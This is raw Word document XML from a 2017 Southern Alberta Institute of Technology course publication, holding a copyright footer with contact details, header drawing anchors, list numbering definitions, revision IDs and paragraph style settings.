    <w:r w:rsidRPr="00E3669A">
      <w:rPr>
        <w:rFonts w:eastAsia="Calibri"/>
        <w:color w:val="000000"/>
        <w:kern w:val="32"/>
        <w:sz w:val="20"/>
        <w:szCs w:val="32"/>
      </w:rPr>
      <w:tab/>
      <w:t>© 2017, Southern Alberta Institute of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802A" w14:textId="686C71C3" w:rsidR="002E6E3D" w:rsidRDefault="002E6E3D" w:rsidP="00017FD6">
    <w:r>
      <w:t>© 2017, Southern Alberta Institute of Technology. All rights reserved.</w:t>
    </w:r>
  </w:p>
  <w:p w14:paraId="6B81DECE" w14:textId="232C2329" w:rsidR="002E6E3D" w:rsidRDefault="002E6E3D" w:rsidP="00017FD6">
    <w:r>
      <w:t>This publication and materials herein are protected by applicable intellectual property laws.</w:t>
    </w:r>
  </w:p>
  <w:p w14:paraId="65B9C7A0" w14:textId="130561B0" w:rsidR="002E6E3D" w:rsidRDefault="002E6E3D" w:rsidP="00017FD6">
    <w:r>
      <w:t>Unauthorized reproduction and distribution of this publication in whole or part is prohibited.</w:t>
    </w:r>
  </w:p>
  <w:p w14:paraId="6F4DB428" w14:textId="77777777" w:rsidR="002E6E3D" w:rsidRDefault="002E6E3D" w:rsidP="00017FD6"/>
  <w:p w14:paraId="508159DB" w14:textId="5B791053" w:rsidR="002E6E3D" w:rsidRDefault="002E6E3D" w:rsidP="00017FD6">
    <w:r>
      <w:t>For more information, contact:</w:t>
    </w:r>
  </w:p>
  <w:p w14:paraId="0D60F3E3" w14:textId="56AB9BBB" w:rsidR="002E6E3D" w:rsidRDefault="002E6E3D" w:rsidP="00017FD6">
    <w:r>
      <w:t>Director, Centre for Instructional Technology and Development</w:t>
    </w:r>
  </w:p>
  <w:p w14:paraId="4E741738" w14:textId="6D12960E" w:rsidR="002E6E3D" w:rsidRDefault="002E6E3D" w:rsidP="00017FD6">
    <w:r>
      <w:t>Southern Alberta Institute of Technology</w:t>
    </w:r>
  </w:p>
  <w:p w14:paraId="10822D5A" w14:textId="73CAE1C3" w:rsidR="002E6E3D" w:rsidRDefault="002E6E3D" w:rsidP="00017FD6">
    <w:r>
      <w:t>1301 16 Ave. N.W., Calgary, AB T2M 0L4</w:t>
    </w:r>
  </w:p>
  <w:p w14:paraId="7D139869" w14:textId="77777777" w:rsidR="002E6E3D" w:rsidRDefault="002E6E3D" w:rsidP="00017FD6"/>
  <w:p w14:paraId="4943EC27" w14:textId="77777777" w:rsidR="002E6E3D" w:rsidRPr="0088153E" w:rsidRDefault="002E6E3D"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6375" w14:textId="77777777" w:rsidR="002922E3" w:rsidRDefault="002922E3" w:rsidP="007F2B57">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
    <w:p w14:paraId="689F48A2" w14:textId="77777777" w:rsidR="002922E3" w:rsidRDefault="002922E3" w:rsidP="007F2B57"/>
    <w:p w14:paraId="41B2537B" w14:textId="77777777" w:rsidR="002922E3" w:rsidRDefault="002922E3" w:rsidP="007F2B57"/>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="4324DD1A" w14:textId="77777777" w:rsidR="002922E3" w:rsidRDefault="002922E3" w:rsidP="007F2B57">
      <w:r>
        <w:continuationSeparator/>
      </w:r>
    </w:p>
    <w:p w14:paraId="78430C54" w14:textId="77777777" w:rsidR="002922E3" w:rsidRDefault="002922E3" w:rsidP="007F2B57"/>
    <w:p w14:paraId="3F3CE335" w14:textId="77777777" w:rsidR="002922E3" w:rsidRDefault="002922E3"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4CAE" w14:textId="7C93E373" w:rsidR="002E6E3D" w:rsidRPr="0088153E" w:rsidRDefault="002E6E3D" w:rsidP="0088153E">
    <w:pPr>
      <w:pStyle w:val="Header"/>
    </w:pPr>
    <w:r w:rsidRPr="0088153E">
      <w:rPr>
        <w:noProof/>
        <w:lang w:eastAsia="en-CA"/>
      </w:rPr>
      <w:drawing>
        <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251662336"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eastAsia="en-CA"/>
      </w:rPr>
      <mc:AlternateContent>
        <mc:Choice Requires="wps">
          <w:drawing>
            <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251663360"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9D4C5"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377F" w14:textId="6321CB9C" w:rsidR="002E6E3D" w:rsidRPr="00EF5C89" w:rsidRDefault="002E6E3D" w:rsidP="004974D2">
    <w:pPr>
      <w:pStyle w:val="Header"/>
      <w:tabs>
        <w:tab w:val="clear" w:pos="4680"/>
        <w:tab w:val="clear" w:pos="9360"/>
        <w:tab w:val="left" w:pos="2847"/>
      </w:tabs>
    </w:pPr>
    <w:r w:rsidRPr="0088153E">
      <w:rPr>
        <w:noProof/>
        <w:lang w:eastAsia="en-CA"/>
      </w:rPr>
      <w:drawing>
        <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251659264"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eastAsia="en-CA"/>
      </w:rPr>
      <mc:AlternateContent>
        <mc:Choice Requires="wps">
          <w:drawing>
            <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251660288"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0F1AD"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13C6" w14:textId="77777777" w:rsidR="002E6E3D" w:rsidRPr="00EF5C89" w:rsidRDefault="002E6E3D" w:rsidP="004974D2">
    <w:pPr>
      <w:pStyle w:val="Header"/>
      <w:tabs>
        <w:tab w:val="clear" w:pos="4680"/>
        <w:tab w:val="clear" w:pos="9360"/>
        <w:tab w:val="left" w:pos="2847"/>
      </w:tabs>
    </w:pPr>
    <w:r w:rsidRPr="0088153E">
      <w:rPr>
        <w:noProof/>
        <w:lang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CCC72"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9765C"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="2076C8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36A1"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="AC7E0CF2"/>
    <w:lvl w:ilvl="0" w:tplc="47ACE5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9BA1118"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="1AE8A6D0"/>
    <w:lvl w:ilvl="0" w:tplc="FD08C742">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1134" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:b w:val="0"/>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5" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="2FED5F15"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="B49A205E"/>
    <w:lvl w:ilvl="0" w:tplc="3EB65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C54C6C"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="FE7A294E"/>
    <w:styleLink w:val="Bullets"/>
    <w:lvl w:ilvl="0" w:tplc="1CC8818E">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E9C6862">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="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C8005A">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1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4C76CC">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46836FA">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D28208">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B5C46C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BE8D5E2">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BB87E46">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3EF20351"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="F3C8E828"/>
    <w:lvl w:ilvl="0" w:tplc="265E61B6">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>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8" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="47EF527C"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="F3C8E828"/>
    <w:lvl w:ilvl="0" w:tplc="265E61B6">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>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9" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="52E2611C"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="3E14F758"/>
    <w:lvl w:ilvl="0" w:tplc="3EB65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450057"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="E50A3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A2388"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="7BB688D0"/>
    <w:lvl w:ilvl="0" w:tplc="47ACE5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84C50C9"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="B6E031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D57460D"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="F3C8E828"/>
    <w:lvl w:ilvl="0" w:tplc="265E61B6">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>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num w:numId="1">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="2">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="3">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="4">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="5">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="6">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="7">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="8">
    <w:abstractNumId w:val="13"/>
  </w:num>
  <w:num w:numId="9">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="10">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="11">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="12">
    <w:abstractNumId w:val="12"/>
  </w:num>
  <w:num w:numId="13">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="1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11D38"/>
    <w:rsid w:val="000174C1"/>
    <w:rsid w:val="00017FD6"/>
    <w:rsid w:val="00032989"/>
    <w:rsid w:val="000362BD"/>
    <w:rsid w:val="00036F15"/>
    <w:rsid w:val="00041B5E"/>
    <w:rsid w:val="0004384D"/>
    <w:rsid w:val="000439CA"/>
    <w:rsid w:val="0005300F"/>
    <w:rsid w:val="000537E5"/>
    <w:rsid w:val="00053992"/>
    <w:rsid w:val="000554E3"/>
    <w:rsid w:val="000579BB"/>
    <w:rsid w:val="0009096F"/>
    <w:rsid w:val="00090ACB"/>
    <w:rsid w:val="00095D68"/>
    <w:rsid w:val="000A68EF"/>
    <w:rsid w:val="000B54DB"/>
    <w:rsid w:val="000C1E63"/>
    <w:rsid w:val="000C25FA"/>
    <w:rsid w:val="000D5A67"/>
    <w:rsid w:val="000D6CD4"/>
    <w:rsid w:val="000F1A3D"/>
    <w:rsid w:val="000F6DBC"/>
    <w:rsid w:val="001022DC"/>
    <w:rsid w:val="0010711D"/>
    <w:rsid w:val="00107C1C"/>
    <w:rsid w:val="00117156"/>
    <w:rsid w:val="001328B2"/>
    <w:rsid w:val="00136FA6"/>
    <w:rsid w:val="00141BFE"/>
    <w:rsid w:val="00144E22"/>
    <w:rsid w:val="00147817"/>
    <w:rsid w:val="00147F87"/>
    <w:rsid w:val="001505AA"/>
    <w:rsid w:val="00151EC3"/>
    <w:rsid w:val="001547CE"/>
    <w:rsid w:val="0016421B"/>
    <w:rsid w:val="00166B0D"/>
    <w:rsid w:val="00176656"/>
    <w:rsid w:val="0018667E"/>
    <w:rsid w:val="001A0A50"/>
    <w:rsid w:val="001A7B2E"/>
    <w:rsid w:val="001B0A05"/>
    <w:rsid w:val="001B2261"/>
    <w:rsid w:val="001B2745"/>
    <w:rsid w:val="001C210C"/>
    <w:rsid w:val="001C38F4"/>
    <w:rsid w:val="001C39D4"/>
    <w:rsid w:val="001C41DB"/>
    <w:rsid w:val="001C77AE"/>
    <w:rsid w:val="001D399F"/>
    <w:rsid w:val="001E2684"/>
    <w:rsid w:val="001E53ED"/>
    <w:rsid w:val="001E692B"/>
    <w:rsid w:val="002017BA"/>
    <w:rsid w:val="002049CA"/>
    <w:rsid w:val="0021296C"/>
    <w:rsid w:val="00222736"/>
    <w:rsid w:val="00235887"/>
    <w:rsid w:val="00237CAA"/>
    <w:rsid w:val="00242511"/>
    <w:rsid w:val="00244F7F"/>
    <w:rsid w:val="00250647"/>
    <w:rsid w:val="0025328E"/>
    <w:rsid w:val="00253EC4"/>
    <w:rsid w:val="002555D3"/>
    <w:rsid w:val="002622F2"/>
    <w:rsid w:val="00264C10"/>
    <w:rsid w:val="00266B3F"/>
    <w:rsid w:val="00276B8F"/>
    <w:rsid w:val="002861ED"/>
    <w:rsid w:val="002922E3"/>
    <w:rsid w:val="00292D2F"/>
    <w:rsid w:val="002A1460"/>
    <w:rsid w:val="002A244D"/>
    <w:rsid w:val="002B07D5"/>
    <w:rsid w:val="002C011A"/>
    <w:rsid w:val="002C432D"/>
    <w:rsid w:val="002C6414"/>
    <w:rsid w:val="002D316C"/>
    <w:rsid w:val="002D7572"/>
    <w:rsid w:val="002E0357"/>
    <w:rsid w:val="002E0A4F"/>
    <w:rsid w:val="002E6E3D"/>
    <w:rsid w:val="002F3569"/>
    <w:rsid w:val="00304EC0"/>
    <w:rsid w:val="00310A4F"/>
    <w:rsid w:val="00311CEF"/>
    <w:rsid w:val="00311F98"/>
    <w:rsid w:val="003138FE"/>
    <w:rsid w:val="003152BC"/>
    <w:rsid w:val="00332EE6"/>
    <w:rsid w:val="00337BAE"/>
    <w:rsid w:val="00342C34"/>
    <w:rsid w:val="00350155"/>
    <w:rsid w:val="00350648"/>
    <w:rsid w:val="00357496"/>
    <w:rsid w:val="00373D1D"/>
    <w:rsid w:val="00375F73"/>
    <w:rsid w:val="00393D87"/>
    <w:rsid w:val="003A3840"/>
    <w:rsid w:val="003A6546"/>
    <w:rsid w:val="003B7A1F"/>
    <w:rsid w:val="003C64FE"/>
    <w:rsid w:val="003E09E6"/>
    <w:rsid w:val="003F03F5"/>
    <w:rsid w:val="003F11A2"/>
    <w:rsid w:val="003F12CC"/>
    <w:rsid w:val="003F1384"/>
    <w:rsid w:val="003F2BF5"/>
    <w:rsid w:val="003F3614"/>
    <w:rsid w:val="00406701"/>
    <w:rsid w:val="00406A24"/>
    <w:rsid w:val="00412481"/>
    <w:rsid w:val="0042014E"/>
    <w:rsid w:val="00423726"/>
    <w:rsid w:val="00426F5E"/>
    <w:rsid w:val="00433B33"/>
    <w:rsid w:val="004359D6"/>
    <w:rsid w:val="00442EE8"/>
    <w:rsid w:val="0044631B"/>
    <w:rsid w:val="004503C5"/>
    <w:rsid w:val="004540D0"/>
    <w:rsid w:val="004555CF"/>
    <w:rsid w:val="00457729"/>
    <w:rsid w:val="00464AA9"/>
    <w:rsid w:val="004745D8"/>
    <w:rsid w:val="00475522"/>
    <w:rsid w:val="004974D2"/>
    <w:rsid w:val="004A51BA"/>
    <w:rsid w:val="004A5416"/>
    <w:rsid w:val="004B3928"/>
    <w:rsid w:val="004C46F7"/>
    <w:rsid w:val="004C4C4D"/>
    <w:rsid w:val="004C6B67"/>
    <w:rsid w:val="004E208D"/>
    <w:rsid w:val="004E2235"/>
    <w:rsid w:val="004F6715"/>
    <w:rsid w:val="0050120A"/>
    <w:rsid w:val="005013FA"/>
    <w:rsid w:val="00501C43"/>
    <w:rsid w:val="00501CD1"/>
    <w:rsid w:val="00501F87"/>
    <w:rsid w:val="00506503"/>
    <w:rsid w:val="00512D26"/>
    <w:rsid w:val="00522042"/>
    <w:rsid w:val="00522496"/>
    <w:rsid w:val="00524BCF"/>
    <w:rsid w:val="00527F43"/>
    <w:rsid w:val="0053020C"/>
    <w:rsid w:val="005476F5"/>
    <w:rsid w:val="00551EE2"/>
    <w:rsid w:val="005546A2"/>
    <w:rsid w:val="00566DA9"/>
    <w:rsid w:val="00573C82"/>
    <w:rsid w:val="00576C1D"/>
    <w:rsid w:val="00581DF1"/>
    <w:rsid w:val="00590F16"/>
    <w:rsid w:val="005927A0"/>
    <w:rsid w:val="00595E89"/>
    <w:rsid w:val="005A25B4"/>
    <w:rsid w:val="005B0ADC"/>
    <w:rsid w:val="005B2B6A"/>
    <w:rsid w:val="005C7198"/>
    <w:rsid w:val="005C7232"/>
    <w:rsid w:val="005D144B"/>
    <w:rsid w:val="005D32D8"/>
    <w:rsid w:val="005D7C37"/>
    <w:rsid w:val="005E1D3E"/>
    <w:rsid w:val="005F1180"/>
    <w:rsid w:val="00602175"/>
    <w:rsid w:val="006075E7"/>
    <w:rsid w:val="00613A46"/>
    <w:rsid w:val="006148DC"/>
    <w:rsid w:val="00620CE3"/>
    <w:rsid w:val="006316C1"/>
    <w:rsid w:val="00635BFE"/>
    <w:rsid w:val="006361C4"/>
    <w:rsid w:val="00642125"/>
    <w:rsid w:val="00644444"/>
    <w:rsid w:val="00644DDC"/>
    <w:rsid w:val="00656C5F"/>
    <w:rsid w:val="00657374"/>
    <w:rsid w:val="00666EA3"/>
    <w:rsid w:val="00671289"/>
    <w:rsid w:val="00671503"/>
    <w:rsid w:val="006740A1"/>
    <w:rsid w:val="00675347"/>
    <w:rsid w:val="006826D5"/>
    <w:rsid w:val="006910DC"/>
    <w:rsid w:val="0069485B"/>
    <w:rsid w:val="006A0488"/>
    <w:rsid w:val="006A1CDF"/>
    <w:rsid w:val="006A1EE3"/>
    <w:rsid w:val="006A475D"/>
    <w:rsid w:val="006A6098"/>
    <w:rsid w:val="006A6D5A"/>
    <w:rsid w:val="006B0441"/>
    <w:rsid w:val="006C16DE"/>
    <w:rsid w:val="006E6971"/>
    <w:rsid w:val="00711FD6"/>
    <w:rsid w:val="00717D0B"/>
    <w:rsid w:val="0072059B"/>
    <w:rsid w:val="0072162E"/>
    <w:rsid w:val="00736FFC"/>
    <w:rsid w:val="0074535F"/>
    <w:rsid w:val="00762798"/>
    <w:rsid w:val="0079051C"/>
    <w:rsid w:val="007A2182"/>
    <w:rsid w:val="007A5107"/>
    <w:rsid w:val="007B6BA5"/>
    <w:rsid w:val="007C12F5"/>
    <w:rsid w:val="007C73E8"/>
    <w:rsid w:val="007D01AD"/>
    <w:rsid w:val="007D131C"/>
    <w:rsid w:val="007E5769"/>
    <w:rsid w:val="007E5E19"/>
    <w:rsid w:val="007F0FFE"/>
    <w:rsid w:val="007F2B57"/>
    <w:rsid w:val="007F6F85"/>
    <w:rsid w:val="007F7CB0"/>
    <w:rsid w:val="008022C1"/>
    <w:rsid w:val="00812F17"/>
    <w:rsid w:val="0083252A"/>
    <w:rsid w:val="008334C1"/>
    <w:rsid w:val="00835E23"/>
    <w:rsid w:val="00837D7A"/>
    <w:rsid w:val="008411EE"/>
    <w:rsid w:val="008643DD"/>
    <w:rsid w:val="00877639"/>
    <w:rsid w:val="0088153E"/>
    <w:rsid w:val="008853E9"/>
    <w:rsid w:val="00895D90"/>
    <w:rsid w:val="00897B0B"/>
    <w:rsid w:val="008A1EC8"/>
    <w:rsid w:val="008B0126"/>
    <w:rsid w:val="008B1704"/>
    <w:rsid w:val="008B1ECF"/>
    <w:rsid w:val="008B2EBF"/>
    <w:rsid w:val="008B573D"/>
    <w:rsid w:val="008B5F02"/>
    <w:rsid w:val="008B6EED"/>
    <w:rsid w:val="008B7CD9"/>
    <w:rsid w:val="008C05FF"/>
    <w:rsid w:val="008C2999"/>
    <w:rsid w:val="008C2E88"/>
    <w:rsid w:val="008D2B18"/>
    <w:rsid w:val="008D72B4"/>
    <w:rsid w:val="008E7053"/>
    <w:rsid w:val="008F42D7"/>
    <w:rsid w:val="00900BDB"/>
    <w:rsid w:val="00903F2A"/>
    <w:rsid w:val="00906ADA"/>
    <w:rsid w:val="00916D25"/>
    <w:rsid w:val="009213A0"/>
    <w:rsid w:val="00925041"/>
    <w:rsid w:val="00926A68"/>
    <w:rsid w:val="00931580"/>
    <w:rsid w:val="009340C0"/>
    <w:rsid w:val="00934EB9"/>
    <w:rsid w:val="00935B3E"/>
    <w:rsid w:val="00940E52"/>
    <w:rsid w:val="009539CD"/>
    <w:rsid w:val="00954CA9"/>
    <w:rsid w:val="00955C37"/>
    <w:rsid w:val="00956AFF"/>
    <w:rsid w:val="00970B47"/>
    <w:rsid w:val="009744B7"/>
    <w:rsid w:val="0099405D"/>
    <w:rsid w:val="009973E8"/>
    <w:rsid w:val="009A2A34"/>
    <w:rsid w:val="009A31BD"/>
    <w:rsid w:val="009A3E1C"/>
    <w:rsid w:val="009A557C"/>
    <w:rsid w:val="009B121B"/>
    <w:rsid w:val="009C1F3C"/>
    <w:rsid w:val="009C5307"/>
    <w:rsid w:val="009C77F7"/>
    <w:rsid w:val="009D478D"/>
    <w:rsid w:val="009D4C43"/>
    <w:rsid w:val="009E1065"/>
    <w:rsid w:val="009E5F26"/>
    <w:rsid w:val="009E7A35"/>
    <w:rsid w:val="009F12FE"/>
    <w:rsid w:val="009F4E55"/>
    <w:rsid w:val="009F6C19"/>
    <w:rsid w:val="00A0220C"/>
    <w:rsid w:val="00A07387"/>
    <w:rsid w:val="00A213D6"/>
    <w:rsid w:val="00A300E3"/>
    <w:rsid w:val="00A40050"/>
    <w:rsid w:val="00A412CE"/>
    <w:rsid w:val="00A45EC3"/>
    <w:rsid w:val="00A45FB0"/>
    <w:rsid w:val="00A504CA"/>
    <w:rsid w:val="00A5077E"/>
    <w:rsid w:val="00A57D85"/>
    <w:rsid w:val="00A63D66"/>
    <w:rsid w:val="00A70299"/>
    <w:rsid w:val="00A86C79"/>
    <w:rsid w:val="00AA3847"/>
    <w:rsid w:val="00AA6F1C"/>
    <w:rsid w:val="00AB0667"/>
    <w:rsid w:val="00AB152B"/>
    <w:rsid w:val="00AC0083"/>
    <w:rsid w:val="00AC33B9"/>
    <w:rsid w:val="00AC4E1E"/>
    <w:rsid w:val="00AD3443"/>
    <w:rsid w:val="00AD73F9"/>
    <w:rsid w:val="00AF4B66"/>
    <w:rsid w:val="00AF5666"/>
    <w:rsid w:val="00B00C23"/>
    <w:rsid w:val="00B03A8B"/>
    <w:rsid w:val="00B074E1"/>
    <w:rsid w:val="00B20D10"/>
    <w:rsid w:val="00B26873"/>
    <w:rsid w:val="00B317F4"/>
    <w:rsid w:val="00B370C7"/>
    <w:rsid w:val="00B42018"/>
    <w:rsid w:val="00B4401E"/>
    <w:rsid w:val="00B50963"/>
    <w:rsid w:val="00B53BF5"/>
    <w:rsid w:val="00B604D4"/>
    <w:rsid w:val="00B63FB0"/>
    <w:rsid w:val="00B7362B"/>
    <w:rsid w:val="00B97B1D"/>
    <w:rsid w:val="00BA4726"/>
    <w:rsid w:val="00BA75D0"/>
    <w:rsid w:val="00BA760C"/>
    <w:rsid w:val="00BB3F7A"/>
    <w:rsid w:val="00BC5DCE"/>
    <w:rsid w:val="00BC625A"/>
    <w:rsid w:val="00BD2F30"/>
    <w:rsid w:val="00BD376D"/>
    <w:rsid w:val="00BD6DFC"/>
    <w:rsid w:val="00BE4CF4"/>
    <w:rsid w:val="00BE62D6"/>
    <w:rsid w:val="00BF377E"/>
    <w:rsid w:val="00BF50BB"/>
    <w:rsid w:val="00C01287"/>
    <w:rsid w:val="00C04854"/>
    <w:rsid w:val="00C05E3C"/>
    <w:rsid w:val="00C10994"/>
    <w:rsid w:val="00C10B87"/>
    <w:rsid w:val="00C16C0A"/>
    <w:rsid w:val="00C24CD4"/>
    <w:rsid w:val="00C30867"/>
    <w:rsid w:val="00C347D7"/>
    <w:rsid w:val="00C43AB3"/>
    <w:rsid w:val="00C51F78"/>
    <w:rsid w:val="00C52086"/>
    <w:rsid w:val="00C577BB"/>
    <w:rsid w:val="00C615B2"/>
    <w:rsid w:val="00C62FAE"/>
    <w:rsid w:val="00C63A58"/>
    <w:rsid w:val="00C65103"/>
    <w:rsid w:val="00C72591"/>
    <w:rsid w:val="00C75B60"/>
    <w:rsid w:val="00C91BB9"/>
    <w:rsid w:val="00C964E5"/>
    <w:rsid w:val="00C96B09"/>
    <w:rsid w:val="00CA62B7"/>
    <w:rsid w:val="00CB2BF7"/>
    <w:rsid w:val="00CB5220"/>
    <w:rsid w:val="00CC08CE"/>
    <w:rsid w:val="00CC0FE8"/>
    <w:rsid w:val="00CC55E1"/>
    <w:rsid w:val="00CC79F5"/>
    <w:rsid w:val="00CD0BF9"/>
    <w:rsid w:val="00CD1ECD"/>
    <w:rsid w:val="00CD2ABB"/>
    <w:rsid w:val="00CE6287"/>
    <w:rsid w:val="00CF76BE"/>
    <w:rsid w:val="00D04231"/>
    <w:rsid w:val="00D250AC"/>
    <w:rsid w:val="00D26144"/>
    <w:rsid w:val="00D362DC"/>
    <w:rsid w:val="00D368B9"/>
    <w:rsid w:val="00D43C78"/>
    <w:rsid w:val="00D46258"/>
    <w:rsid w:val="00D46644"/>
    <w:rsid w:val="00D52A6B"/>
    <w:rsid w:val="00D54319"/>
    <w:rsid w:val="00D60049"/>
    <w:rsid w:val="00D601EB"/>
    <w:rsid w:val="00D6505F"/>
    <w:rsid w:val="00D659F2"/>
    <w:rsid w:val="00D664EC"/>
    <w:rsid w:val="00D66767"/>
    <w:rsid w:val="00D67285"/>
    <w:rsid w:val="00D70416"/>
    <w:rsid w:val="00D74B2C"/>
    <w:rsid w:val="00D87D1A"/>
    <w:rsid w:val="00DB00A4"/>
    <w:rsid w:val="00DB0871"/>
    <w:rsid w:val="00DB23A1"/>
    <w:rsid w:val="00DB37E7"/>
    <w:rsid w:val="00DC01D0"/>
    <w:rsid w:val="00DC1539"/>
    <w:rsid w:val="00DC3BFD"/>
    <w:rsid w:val="00DC42EA"/>
    <w:rsid w:val="00DC55FB"/>
    <w:rsid w:val="00DC7B81"/>
    <w:rsid w:val="00DD4EC2"/>
    <w:rsid w:val="00DD612B"/>
    <w:rsid w:val="00DD77EA"/>
    <w:rsid w:val="00DE03BC"/>
    <w:rsid w:val="00DE2345"/>
    <w:rsid w:val="00DE3C98"/>
    <w:rsid w:val="00DE4B75"/>
    <w:rsid w:val="00E00E9B"/>
    <w:rsid w:val="00E026F5"/>
    <w:rsid w:val="00E02798"/>
    <w:rsid w:val="00E030BE"/>
    <w:rsid w:val="00E070CA"/>
    <w:rsid w:val="00E0749B"/>
    <w:rsid w:val="00E22232"/>
    <w:rsid w:val="00E22447"/>
    <w:rsid w:val="00E331EA"/>
    <w:rsid w:val="00E3669A"/>
    <w:rsid w:val="00E3721C"/>
    <w:rsid w:val="00E409A4"/>
    <w:rsid w:val="00E43555"/>
    <w:rsid w:val="00E45F6E"/>
    <w:rsid w:val="00E513C5"/>
    <w:rsid w:val="00E528C4"/>
    <w:rsid w:val="00E5353D"/>
    <w:rsid w:val="00E548FA"/>
    <w:rsid w:val="00E552DA"/>
    <w:rsid w:val="00E56E10"/>
    <w:rsid w:val="00E64327"/>
    <w:rsid w:val="00E7012B"/>
    <w:rsid w:val="00E71EBA"/>
    <w:rsid w:val="00E75F73"/>
    <w:rsid w:val="00E83E94"/>
    <w:rsid w:val="00E87B6C"/>
    <w:rsid w:val="00EA0ED5"/>
    <w:rsid w:val="00EA5E49"/>
    <w:rsid w:val="00EB1138"/>
    <w:rsid w:val="00EB176F"/>
    <w:rsid w:val="00EC5E6E"/>
    <w:rsid w:val="00ED273E"/>
    <w:rsid w:val="00ED3282"/>
    <w:rsid w:val="00ED5812"/>
    <w:rsid w:val="00EE69F9"/>
    <w:rsid w:val="00EF2314"/>
    <w:rsid w:val="00EF2EBA"/>
    <w:rsid w:val="00EF4450"/>
    <w:rsid w:val="00EF5C89"/>
    <w:rsid w:val="00EF71C6"/>
    <w:rsid w:val="00F02202"/>
    <w:rsid w:val="00F03265"/>
    <w:rsid w:val="00F0551D"/>
    <w:rsid w:val="00F116E0"/>
    <w:rsid w:val="00F11DDC"/>
    <w:rsid w:val="00F216F2"/>
    <w:rsid w:val="00F218C9"/>
    <w:rsid w:val="00F33A84"/>
    <w:rsid w:val="00F33B45"/>
    <w:rsid w:val="00F41C71"/>
    <w:rsid w:val="00F475A9"/>
    <w:rsid w:val="00F513D3"/>
    <w:rsid w:val="00F62EC0"/>
    <w:rsid w:val="00F66AFE"/>
    <w:rsid w:val="00F83FA7"/>
    <w:rsid w:val="00F84035"/>
    <w:rsid w:val="00F8419B"/>
    <w:rsid w:val="00F8588C"/>
    <w:rsid w:val="00F86647"/>
    <w:rsid w:val="00F95AEC"/>
    <w:rsid w:val="00FA2396"/>
    <w:rsid w:val="00FB3D74"/>
    <w:rsid w:val="00FC1CFE"/>
    <w:rsid w:val="00FC6E91"/>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6F82A5"/>
  <w15:docId w15:val="{B0EE69F7-AD98-4762-8497-036329DA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E55"/>
    <w:pPr>
      <w:spacing w:line="276" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
      <w:sz w:val="22"/>
      <w:szCs w:val="22"/>
      <w:lang w:val="en-CA"/>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F84035"/>
    <w:pPr>
      <w:spacing w:before="120"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Source">
    <w:name w:val="Source"/>
    <w:basedOn w:val="SAITCaption"/>
    <w:qFormat/>
    <w:rsid w:val="00F84035"/>
    <w:pPr>
      <w:spacing w:before="0" w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:b w:val="0"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>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CommentSubject">
    <w:name w:val="annotation subject"/>
    <w:basedOn w:val="CommentText"/>
    <w:next w:val="CommentText"/>
    <w:link w:val="CommentSubjectChar"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00566DA9"/>
    <w:rPr>
      <w:rFonts w:eastAsia="Times New Roman"/>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
